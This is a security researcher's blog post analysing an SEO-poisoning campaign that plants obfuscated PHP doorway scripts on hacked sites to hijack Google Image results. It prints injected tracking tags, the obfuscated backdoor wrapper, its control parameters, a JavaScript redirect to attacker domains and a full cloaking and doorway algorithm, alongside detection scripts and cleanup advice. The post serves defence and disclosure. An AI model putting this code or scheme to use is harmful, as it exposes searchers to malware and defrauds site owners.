Thousands of Hacked Sites Seriously Poison Google Image Search Results

This investigation began a few weeks ago, when I came across the following two threads in website security forums:

[badwarebusters.org] Lately I have been seeing a huge increase in the number of hacked sites appearing on google image search results that redirect to a fake Av scanner.

[Google Webmaster Help] google image search results often has multiple infected / malware sites on the first SERP page.

This is a well-known problem. I have blogged about such SEO poisoning attacks several times here. This time I decided to check what’s behind the reported increase in malicious image search results.

The attack uses cloaking: search engine bots are fed keyword-rich pages with hot-linked images, while visitors who arrive from search engines get malicious JavaScript that redirects them to fake AV sites.

Here’s a screenshot of a typical Google Image search results page where I highlighted suspicious results. Pink frame: the image is hot-linked. Red frame: the result is outright malicious and redirects to a fake AV site. (I wish Google had similar highlighting to warn unsuspecting searchers.)

My goal was to find out:

how the sites were compromised and what webmasters can do to prevent such infections

and whether it was possible to identify all compromised sites and have Google remove hijacked search results from its index.

Imgaaa

I began with checking home pages of a few known hacked sites trying to find some common patterns. Quite soon I discovered the following code at the very bottom of most of them:

<img heigth="1" width="1" border="0" src="hxxp://imgaaa .net/t.php?id=6214178">

Some alternative variants

<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168">
or
<iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe>
Update (May 6th, 2011) or
<img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=15433533">

The “imgaaa .net” domain didn’t resolve and the code looked suspicious so I decided to google for this imgaaa.

Quite soon I found this thread on the WordPress support forum. It was the key to answering all my questions. I asked people to help with my investigation and they provided me with important internal information (e.g. .php files uploaded by hackers and some statistics). This information helped me reconstruct the whole scheme behind this attack, find thousands of infected sites and estimate the scale of the problem.

Update (May 6th, 2011): Some other domains on the same IP as imgaaa .net: imgbbb.net, imgccc .net, imgddd .net, ingeee .net.
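Webmasters who want to check their own pages for this tag can search the HTML for its two stable features: the misspelled heigth attribute and the /t.php?id= URL. Here is a minimal Python sketch of such a check. The regular expression is my own reading of the samples above, it assumes that heigth appears before src (as it does in every sample), and the tracker.example host is a placeholder.

```python
import re

# Pattern for the injected 1x1 tags quoted above. Only the misspelled
# "heigth" attribute and the "/t.php?id=<digits>" URL come from the samples;
# the rest of the pattern is an assumption.
INJECTED_TAG = re.compile(
    r'<(?:img|iframe)\b[^>]*\bheigth="1"[^>]*\bsrc="[^"]*/t\.php\?id=\d+"',
    re.IGNORECASE,
)


def find_injected_tags(html):
    """Return the matching part of every injected-looking tag in `html`."""
    return [match.group(0) for match in INJECTED_TAG.finditer(html)]


if __name__ == "__main__":
    # Hypothetical page footer; tracker.example is a placeholder host.
    sample = (
        "<p>Footer</p>\n"
        '<img heigth="1" width="1" border="0" '
        'src="http://tracker.example/t.php?id=1234567">'
    )
    for tag in find_injected_tags(sample):
        print("suspicious:", tag)
```

A correctly spelled height attribute does not match, so ordinary 1x1 tracking pixels are not flagged.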

Short description

1. Criminals use stolen FTP credentials to upload malicious .php files to compromised servers. (confirmed both by webmasters who found trojans on their computers and by hosting providers who found attack traces in FTP logs)

2. These files generate spammy web pages on the fly. For keyword-rich content they use a combination of top Google web search results and Image search results.

3. The generated spammy pages are interlinked to make sure Googlebot discovers them all. Moreover, they use Google’s suggested searches to generate links to new spammy pages (they will be generated on-the-fly when Googlebot follows the links). This simple scheme makes Google generate spam for its own index.

4. To have Google discover the spammy pages in the first place, criminals create blogs using free blogging services (e.g. http://blog.fc2.com/) where they post links to newly created spam-generating scripts on hacked sites.

5. Now the Google exploit in action: The combination of keywords from top Google search results for particular keywords and hot-linked images returned by Google Image search for the same keywords, makes the newly generated spammy pages appear at the top (the first page) of Google Image search results within a few days, hijacking results of sites that actually host (and usually own) the images.

This works like a charm. Exploiting this flaw, cybercriminals managed to hijack search results on the first pages of Google Image search for millions of keywords. I estimate that this trick generates at least 15 million clicks on poisoned image search results every month. (Calculations and a detailed description of how this Google exploit works can be found below.)

6. What makes this a security problem is what happens when people click on such hijacked search results. The rogue script detects a visitor that comes from search results and substitutes the spammy page with some malicious JavaScript (that in most cases redirects to fake AV sites).

Detailed reconstruction of the attack

1. Uploading the PHP script.

Malicious hackers use stolen FTP login details to upload an obfuscated .php file to some directory on a server. They may upload several identical files with different names to different directories.

Here are the IP addresses that people usually find in FTP logs: 46.252.130.109 and 91.200.240.10.
Update (May 10th, 2011): Two comments mentioned one more IP: 91.200.241.200.

The .php script usually has a name that consists of either two random digits (e.g. 35.php) or three random letters (e.g. gmp.php).

The file contains about 11 KB of obfuscated code:

<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/ZmVSKRVBINtZbTiAR4Yd...skipped...wV/UO/k/6QMUUQ=='))); ?>

This file is responsible for generating spammy pages, pushing malicious content and uploading additional files to a server.
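If you find such a file and want to read what it hides without running it, the wrapper can be undone offline. PHP’s gzuncompress reads zlib-format data, which Python’s zlib.decompress also handles. The sketch below only decodes; it never evaluates anything. The function name and the regular expression are mine, and real samples may differ in quoting or whitespace.

```python
import base64
import re
import zlib
from typing import Optional

# Matches the wrapper shown above: eval(gzuncompress(base64_decode('...')))
WRAPPER = re.compile(
    r"eval\(\s*gzuncompress\(\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)"
)


def decode_payload(php_source: str) -> Optional[str]:
    """Return the hidden PHP source as text, or None if no wrapper is found.

    Nothing is executed: the blob is only base64-decoded and inflated.
    """
    match = WRAPPER.search(php_source)
    if match is None:
        return None
    raw = zlib.decompress(base64.b64decode(match.group(1)))
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Build a harmless stand-in for the real (elided) payload.
    hidden = "echo 'hello';"
    blob = base64.b64encode(zlib.compress(hidden.encode())).decode()
    print(decode_payload("<? eval(gzuncompress(base64_decode('%s'))); ?>" % blob))
```

Obfuscators often nest several such layers, so the decoded text may itself contain another wrapper.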

2. Preparation (alcobro)

Now the uploaded script has to be registered and added to the network of compromised sites. To do so, hackers make a request with the ?q=alcobro parameter.

This request prepares the hacked site. It creates the following directories:

/.log
/.log/compromiseddomain.com

where compromiseddomain.com is the domain name that I will use in this post as a replacement for the actual domain names of compromised sites.

Then it creates a file called /.log/compromiseddomain.com/xmlrpc.txt and writes the following line there: “bestnetblog.net”. This file contains the domain name of the remote server from which the script can request new malicious code.

Then it tries to create an .htaccess file with the following content:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ script-name.php?q=$1 [L]
</IfModule>

where script-name.php is the path to the uploaded .php file (e.g. /wp-admin/26.php).

These rewrite rules define “SEO-friendly” links for doorway pages. Instead of hxxp://compromiseddomain.com/wp-admin/26.php?q=search-keywords the link will read as hxxp://compromiseddomain.com/wp-admin/search-keywords/

This .htaccess file is only created if one doesn’t already exist. Otherwise, ?q=search-keywords links will be used.

Finally, the script contacts
hxxp://bestnetblog .net//logdomain.php?q=compromiseddomain.com to let the criminals know that compromiseddomain.com is ready to generate doorway pages.
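The rewrite rule quoted above has a recognizable shape: every path is passed to a .php file as its q parameter. A webmaster could look for that shape in .htaccess files with something like the following sketch. The regular expression is an assumption based on that single sample. A match is a lead, not proof, because some content management systems (Drupal 6, for one) ship a very similar rule that points at index.php.

```python
import re

# A RewriteRule that sends every path to a .php file as its "q" parameter,
# e.g.  RewriteRule ^(.*)$ script-name.php?q=$1 [L]
CATCH_ALL_RULE = re.compile(
    r"^\s*RewriteRule\s+\^\(\.\*\)\$\s+(\S+\.php)\?q=\$1\b",
    re.IGNORECASE | re.MULTILINE,
)


def doorway_rewrite_targets(htaccess_text):
    """Return the .php targets of catch-all '?q=$1' rewrite rules."""
    return CATCH_ALL_RULE.findall(htaccess_text)


if __name__ == "__main__":
    sample = (
        "<IfModule mod_rewrite.c>\n"
        "RewriteEngine On\n"
        "RewriteCond %{REQUEST_FILENAME} !-f\n"
        "RewriteCond %{REQUEST_FILENAME} !-d\n"
        "RewriteRule ^(.*)$ script-name.php?q=$1 [L]\n"
        "</IfModule>\n"
    )
    print(doorway_rewrite_targets(sample))
```

Any target other than the site’s own front controller (for example a two-digit file name under /wp-admin/) deserves a closer look.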

Alternative maintenance requests

?dom100500=<domain.com> – this request updates the content of the xmlrpc.txt file with the domain name of a malicious server that hosts fresh redirect code.

Currently they use the following domain names: love-adamcom.net, love-adambiz.net, love-adamorg.net, love-adaminfo.net – all 184.82.169.171

?up100500=<some-value> – this request turns the script into an upload form.

On one compromised site they used this functionality to upload a web shell script called avuv.php.
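The three maintenance parameters (q=alcobro, dom100500 and up100500) are unusual enough to search for in raw access logs. The sketch below filters log lines for them. The log lines in the demo are invented examples in the common Apache format, not lines from real logs.

```python
import re

# Query-string markers of the maintenance requests described above.
MAINTENANCE_REQUEST = re.compile(r"[?&](?:q=alcobro\b|dom100500=|up100500=)")


def maintenance_hits(log_lines):
    """Return the log lines that contain one of the maintenance requests."""
    return [line.rstrip("\n") for line in log_lines
            if MAINTENANCE_REQUEST.search(line)]


if __name__ == "__main__":
    # Invented log lines; 203.0.113.0/24 is a documentation-only IP range.
    sample_log = [
        '203.0.113.5 - - [01/May/2011:10:00:00 +0000] "GET /wp-admin/26.php?q=alcobro HTTP/1.1" 200 12',
        '203.0.113.9 - - [01/May/2011:10:05:00 +0000] "GET /index.php?q=node/1 HTTP/1.1" 200 5120',
        '203.0.113.5 - - [01/May/2011:10:07:00 +0000] "GET /images/gmp.php?up100500=1 HTTP/1.1" 200 340',
    ]
    for hit in maintenance_hits(sample_log):
        print(hit)
```

The path in each hit also tells you where the doorway script was uploaded.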

Processing q requests

The main function of the script is to process ?q=search-keywords requests (or /search-keywords in case of the appropriate .htaccess rules).

The script distinguishes three different situations:

Request from a search engine bot (determined by the IP address). In this case the script generates a keyword-rich page (see the algorithm below) and feeds it to the bot.

Visitor that clicked on a search engine result on Google, Yahoo or Bing (determined by the referrer header). In this case the script returns a malicious JavaScript.
Note 1: the malicious JavaScript is not returned if the search query contains the “site:” operator (to hide the malicious content from site owners and tools that rely on this operator)
Note 2: the malicious JavaScript is always returned if your browser is Opera (even if you don’t come from a search engine)

All other requests are simply redirected to the homepage.
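For anyone trying to reproduce the behaviour on their own hacked site, it helps to know which kind of request triggers which response. The decision table above can be written down as a small Python function. This is my reconstruction, not the attackers’ code: the order of the checks, the crude host matching and the handling of “site:” queries (the post only says the JavaScript is withheld) are assumptions.

```python
from urllib.parse import unquote_plus, urlsplit

# Substrings used to spot a search engine referrer (crude, for illustration).
SEARCH_ENGINES = ("google.", "yahoo.", "bing.")


def classify_request(is_search_bot_ip, referrer, user_agent):
    """Return 'spam_page', 'malicious_js' or 'redirect_home'."""
    if is_search_bot_ip:
        return "spam_page"              # bots get the keyword-rich page
    if "Opera" in user_agent:
        return "malicious_js"           # Note 2: Opera always gets the script
    parts = urlsplit(referrer)
    host = parts.hostname or ""
    if any(name in host for name in SEARCH_ENGINES):
        if "site:" in unquote_plus(parts.query):
            # Note 1: JavaScript is withheld. Treating the request like any
            # other non-search request is an assumption.
            return "redirect_home"
        return "malicious_js"
    return "redirect_home"


if __name__ == "__main__":
    print(classify_request(False, "http://www.google.com/search?q=sarpagandha", "Mozilla/5.0"))
    print(classify_request(False, "", "Mozilla/5.0"))
```

In practice this means a plain visit to a doorway URL shows nothing suspicious; the request needs a search engine referrer (or a bot’s IP address) to reveal anything.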

Perfect doorway generator (algorithm)

To generate a web page that can hijack image search results for a “search-keywords” query, the script does the following:

1. Get descriptions of top 50 Google web search results for “search keywords“.

2. Shuffle the words in those descriptions randomly to get some unique text.

The resulting text is not intelligible, but it’s enough to exploit this flaw in Google. Here’s an excerpt from a real spammy page that targets the “sarpagandha” keyword:

“It has been used since ages in Print e-mail ayurveda herb finder miscategorized Tablets, sarpagandha experts belongs Advice on ayurvedic medicines herbalsarpagandha Linn, family botanical name rauvolfia serpentina…”

3. Get top 20 Google Image search results for “search keywords” and extract links to image files.

4. Generate <img> tags for each extracted image link. E.g.

<img src="http://www.hijacked-site1.com/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">

5. Shuffle the generated <img> tags (to change their order)

6. Break the text generated in step #2 into sentences and mix them with the <img> tags. The result is keyword-rich HTML code with hot-linked images for the “search keywords” query.

7. To facilitate discovery of new pages and to provide them with incoming links, each spammy page contains a section that links to the 30 most recently generated doorway pages.

8. Get up to 10 suggested keywords from Google autocomplete and use them to generate links to doorway pages that target these suggested keywords. This way Google itself suggests what search keywords should be targeted. Spammers only need to come up with a few initial keywords; Google will do the rest itself.

9. At the bottom of each spammy block, there is a section of links to 6 alternative pages for the same “search keywords”. The links look like this:

<p><a href="http://compromiseddomain.com/search-keywords&page=2" title="Search Keywords">Search Keywords - Page 2</a> | ...skipped.... >Search Keywords - Page 7</a></p>

All those pages are generated the same way. The only difference is that page #2 takes image links from the second page of Google Image search results, page #3 from the third page, and so on. The textual parts of these pages use exactly the same words, only in a different (random) order.

10. Spammy block template. Then the algorithm concatenates all the generated parts into a single block that looks like this:

<h1>SEARCH KEYWORDS</h1>
suggested links
links to 30 most recently generated pages
keyword-rich text with hot-linked images
links to alternative pages

11. Spammy page template. So that this generated spammy block doesn’t look too outlandish, it is inserted in the middle of the HTML code of the real homepage of the compromised site.

The HTML template is stored in the .log/compromiseddomain.com/shab100500.txt file. It’s basically the HTML code of the site’s homepage with the <REPLACEME> placeholder that will later be replaced with a generated spammy block.

A few more important modifications are made to this template when the script generates spammy pages:

the original <title> tag is replaced with <title>Search Keywords</title>

and the <meta name="googlebot" content="noarchive"> tag is inserted. That’s why you don’t see cached copies of the pages in Google search results, which definitely makes diagnosing the problem more difficult for webmasters. (Fortunately, they can still use the “Fetch as Googlebot” tool in Google Webmaster Tools.)
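Step 9 notes that the alternative pages for one keyword use exactly the same words in a different order. That property gives a simple way to recognise a pair of doorway pages: compare their word counts and ignore the order. The following Python sketch does this for two plain-text strings. It assumes the HTML markup has already been stripped, and the tokenization rule is my own choice.

```python
import re
from collections import Counter


def word_bag(text):
    """Count lower-cased alphanumeric words, ignoring order and punctuation."""
    return Counter(re.findall(r"[a-z0-9]+", text.lower()))


def is_reshuffle(text_a, text_b):
    """True if the two texts differ but consist of exactly the same words."""
    bag_a = word_bag(text_a)
    return bool(bag_a) and text_a != text_b and bag_a == word_bag(text_b)


if __name__ == "__main__":
    page_1 = "ayurveda herb finder sarpagandha experts"
    page_2 = "sarpagandha experts finder ayurveda herb"
    print(is_reshuffle(page_1, page_2))
```

Two legitimate pages about the same topic share many words but almost never the identical multiset, which is why an exact comparison is enough here.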

Caching

Once the spammy page is generated, it is saved on disk so that all subsequent requests to the same page will be served directly from cache.

The cached pages are saved in the .log/compromiseddomain.com/ directory and have the following filenames:

The first page: .log/compromiseddomain.com/search-keywords.html
Page #N : .log/compromiseddomain.com/search-keywords.htmlN where N is a number from 2 to 7

Since the spammy pages are only generated for search engine bots, the number of cache files provides us with quite an accurate number of indexed spammy pages. (It is not always possible to come up with Google search queries that return only spammy pages and at the same time all spammy pages on a particular domain.)

I’ve checked cache directories on many hacked sites. I rarely saw fewer than 1,000 files there. Some sites even had more than 100,000 cache files created in less than three months.
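Counting the cache files is easy to automate once you have a directory listing. The sketch below counts first pages (.html) and alternative pages (.html2 to .html7) separately, following the naming scheme described above. The function name is mine, and the file names in the demo are made up.

```python
import re

# <keywords>.html for the first page, <keywords>.htmlN (N = 2..7) for the rest.
CACHE_NAME = re.compile(r"^.+\.html(?P<page>[2-7])?$")


def count_cached_doorways(filenames):
    """Return (first_pages, alternative_pages) found in a directory listing."""
    first_pages = 0
    alternative_pages = 0
    for name in filenames:
        match = CACHE_NAME.match(name)
        if match is None:
            continue                      # e.g. xmlrpc.txt, iog.txt
        if match.group("page"):
            alternative_pages += 1
        else:
            first_pages += 1
    return first_pages, alternative_pages


if __name__ == "__main__":
    listing = ["sarpagandha.html", "sarpagandha.html2", "sarpagandha.html7",
               "xmlrpc.txt", "iog.txt", "shab100500.txt"]
    print(count_cached_doorways(listing))
```

On a real server the listing would come from something like os.listdir() on the .log/compromiseddomain.com/ directory.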

Sidenote: The spammy pages are only generated when Googlebot tries to index them. Moreover, three Google services are used in the spam generation process. Effectively, Google itself generates the spam that poisons its index. What an irony!

Malicious redirects.

Let’s get back to real people who click on poisoned image search results. When the script detects a victim (visitor from Google, Yahoo or Bing) it returns some malicious code instead of the requested spammy page.

This malicious code is stored in the .log/compromiseddomain.com/iog.txt file and looks like this:

var url = "hxxp://wcwrwpea .cz.cc/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";
if (window!=top) {top.location.href = url;} else document.location= url;

Note how it breaks out of the frames. Google’s Image search interstitial pages can’t stop the redirect.

This file is updated every 30 minutes. Remember the xmlrpc.txt file that contains the address of the remote server? This is where this address is used.

Every 30 minutes the script pulls a new malicious script from
hxxp://remote-server-from-xmlrpc-txt/badcompany.php?q=compromiseddomain.com/script-name.php

So far the only changes are the domain names of sites where the script redirects web surfers to. Here are just a few domains used in this attack:

oppuvjyz .cz.cc, sljngefn .cz.cc, qtmgqqxh .cz.cc, qeiskziv .cz.cc, jfdevxvo.cz.cc, zpggpimd .cz.cc, uywgxabe .cz.cc, hdmibzur .cz.cc, kjqxyxiu .cz.cc, wcwrwpea .cz.cc

These domains have a very short lifetime, so security tools that rely on blacklists simply don’t have enough time to flag them and update their blacklists. That’s why Google’s Safe Browsing database, which is used by many modern web browsers, is of very little help here. Moreover, Google even has a hard time finding and blacklisting the malicious doorway pages on hacked sites. Less than 5% of them are currently flagged.

Note that although the doorway pages currently return malicious scripts that redirect to fake AV sites, they can easily switch to any other type of JavaScript: a browser exploit or a redirect to some shady content (e.g. porn, pirated stuff, counterfeit drugs, gambling sites, etc.).

Statistics and estimates

This scheme works extremely well for spammers. It exploits the flaw in Google Image search so well that the doorway pages inevitably make it to the first pages of image search results for almost every keyword combination that consists of at least a couple of words. Let me prove it with some numbers.

I have compiled a list of 5,000+ hacked sites (the list is incomplete) with millions of doorway pages. And I have a very long list of keywords targeted by the spammy pages. I checked more than a hundred random Google Images searches from that list. For most of them (~90%) I found at least one hijacked search result on the first page. In about 50% of cases there was more than one poisoned search result within the top 20. For some keywords, poisoned search results occupied more than half of the positions on the first page of results. Results below the top 20 were poisoned even more seriously.

And the main problem is not that cybercrooks managed to seriously poison Google Image search results but the fact that many people do click on such results and get exposed to malicious content.

I’ve received logs from some hacked sites and can estimate the traffic Google sends to such doorway pages.

An average hacked site has ~1,000 indexed doorway pages.
There are 5,000+ hacked sites that I know of.
This gives us 5,000,000+ indexed doorway pages.
An average doorway page has 1 visitor from Google every 10 days.
So all doorway pages should have 500,000+ visits from Google every day
Or 15,000,000+ visits every month

Note that this is probably an underestimate since I used numbers on the lower side.
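The arithmetic behind this estimate is short enough to spell out, which makes it easy to plug in your own numbers. In the Python sketch below the three inputs are the figures from the list above; the 30-day month is the only value I added.

```python
def estimate_traffic(hacked_sites, pages_per_site, days_between_visits,
                     days_per_month=30):
    """Return (indexed_pages, visits_per_day, visits_per_month)."""
    indexed_pages = hacked_sites * pages_per_site
    # One visit per page every `days_between_visits` days.
    visits_per_day = indexed_pages // days_between_visits
    visits_per_month = visits_per_day * days_per_month
    return indexed_pages, visits_per_day, visits_per_month


if __name__ == "__main__":
    # 5,000 sites, 1,000 pages each, 1 Google visitor per page every 10 days.
    print(estimate_traffic(5_000, 1_000, 10))  # (5000000, 500000, 15000000)
```

Because every input is a lower bound, the result is a lower bound too.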

And don’t forget that these statistics cover only this particular SEO poisoning attack. There are currently at least a few other similar active attacks that make things significantly worse.

Here’s a representative example: a small hacked Croatian site with PageRank 0. FTP logs showed that it had been hacked on March 18th. According to access logs, on March 19th Google started to index doorway pages. During the next 5 weeks it indexed 27,200+ doorway pages on this site. During the same 5 weeks Google Image search sent 140,000+ visitors to this small site. Very impressive, isn’t it?

The most efficient black hat trick ever

I would call this the most efficient and easy to implement black hat SEO trick to drive search traffic to a site. And you don’t actually need to hack someone else’s sites: you can implement this on your own site with similar results. Of course, you should be prepared for someone to report your site to Google and for Google to remove it from its index altogether, but you can still enjoy having thousands of visitors literally for free before this happens.

But don’t be late to the party! Many black hats already exploit this flaw in Google Image search. It may happen that most of Google Image search results will be hijacked and re-hijacked quite soon and normal people will simply stop using Google for image searches.

To Google

Google, I hope you hear my sarcasm. Is there any chance you’ll close this security hole?

I know, you can’t remove hot-linking sites from image search results altogether for numerous reasons (although it would definitely fix the problem), but you should consider some other steps that could mitigate the problem and you should do it ASAP!

Here are just a few ideas that come to mind:

Give some preference to sites that actually host image files. Don’t encourage image theft.

Improve detection of cloaking and web spam (pages with unintelligible text should not rank high!).

Cooperate with the anti-malware team and have them scan freshly discovered pages that hot-link more than, say, three images. (I hope that malware scanners will eventually be able to detect malicious behavior on such doorway pages.)

Meanwhile, I’m sending my list of 5,000+ hacked sites to Google’s web spam team and to their webmaster trends analysts. I hope you’ll be able to make good use of it and remove these doorway pages from search results.

To Webmasters

To make sure your site is not abused by cybercrooks you should:

Regularly check what pages Google has indexed on your site.
- Use the “site:” searches
- Check statistics in Google Webmaster Tools

Regularly check what search keywords people use to find your site. Google Analytics won’t help here as it only tracks data for your legitimate web pages.
- Use search data in Google Webmaster Tools
- Regularly check raw access logs or tools that analyze access logs (e.g. Webalizer)

Scan your server for suspicious files and directories. It’s a good idea to have some sort of integrity control or version control so that you can easily detect unauthorized changes.

Don’t save passwords in FTP programs. Change passwords every time you find malware on your computer.

Make sure your computer is free from malware. Use a reputable anti-virus tool and regularly update it.

Keep your operating system, web browser and all browser plugins (e.g. Java, Flash) up-to-date. This will help minimize the risk of malware infections that may result in site password theft.
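For the raw access log check mentioned in the list above, the search keywords can be read from the referrer of each request. Here is a minimal Python sketch. It assumes that Google and Bing put the query in the q parameter and Yahoo in p, and it only handles simple referrer URLs. Image search referrers can be more complex, so treat a missing result as “unknown” rather than “no search”.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Query-string parameter that carries the search terms, per engine.
QUERY_PARAMS = {"google": "q", "bing": "q", "yahoo": "p"}


def search_keywords(referrer: str) -> Optional[str]:
    """Return the search terms from a search engine referrer URL, if any."""
    parts = urlsplit(referrer)
    labels = (parts.hostname or "").split(".")
    for engine, param in QUERY_PARAMS.items():
        if engine in labels:
            values = parse_qs(parts.query).get(param)
            return values[0] if values else None
    return None


if __name__ == "__main__":
    print(search_keywords("http://www.google.com/search?q=rauvolfia+serpentina"))
```

Keywords that have nothing to do with your site’s content are a strong hint that doorway pages are being served from it.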

If your site happens to be one of the compromised sites that host malicious doorway pages:

Thoroughly scan your computer for malware

Once your computer is clean, change all site passwords (even for sites that don’t seem to be compromised yet). Don’t save passwords in FTP clients – most of them can’t protect your passwords from malware. Consider using password managers (like KeePass) that encrypt all data with a master password.

Use SFTP instead of FTP if possible.

Now remove the doorway .php script, the .htaccess file with rewrite rules (if it was created), and the .log/ directory with all its content.

You should also scan your server for suspicious files that might have been uploaded to your server using the ?up100500 requests.
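A server scan for the artifacts described in this post can be partly automated. The Python sketch below walks a document root and reports .log directories, .php files that start with the eval(gzuncompress(base64_decode( wrapper, and .php files whose names follow the two-digit or three-letter pattern. It is a starting point under those assumptions only: a name match alone proves nothing, and files uploaded through ?up100500 (such as the web shell mentioned earlier) may look completely different.

```python
import os
import re

# Two random digits or three random letters, as described in this post.
SCRIPT_NAME = re.compile(r"^(?:\d{2}|[a-z]{3})\.php$")
OBFUSCATION_MARKER = b"eval(gzuncompress(base64_decode("


def scan_docroot(root):
    """Return a list of (path, reason) pairs for suspicious items."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if ".log" in dirnames:
            findings.append((os.path.join(dirpath, ".log"),
                             "hidden .log directory"))
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as handle:
                    head = handle.read(4096)   # the wrapper sits at the top
            except OSError:
                continue                        # unreadable file: skip it
            if OBFUSCATION_MARKER in head:
                findings.append((path, "obfuscated eval wrapper"))
            elif SCRIPT_NAME.match(name):
                findings.append((path, "name matches NN.php / xxx.php"))
    return findings


if __name__ == "__main__":
    for path, reason in scan_docroot("."):
        print(reason + ": " + path)
```

Comparing the results against a known-good copy of the site (a backup or version control) is still the most reliable way to spot files that don’t belong.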

##

Did you ever come across Google Image search results that redirected to malicious sites? Maybe your site was a victim of a similar attack? Or maybe this flaw seriously affects your site because spammers hijack your search results in Google Image search?

Original article from sites:

http://malware.im/thousands-of-hacked-sites-seriously-poison-google-image-search-results/
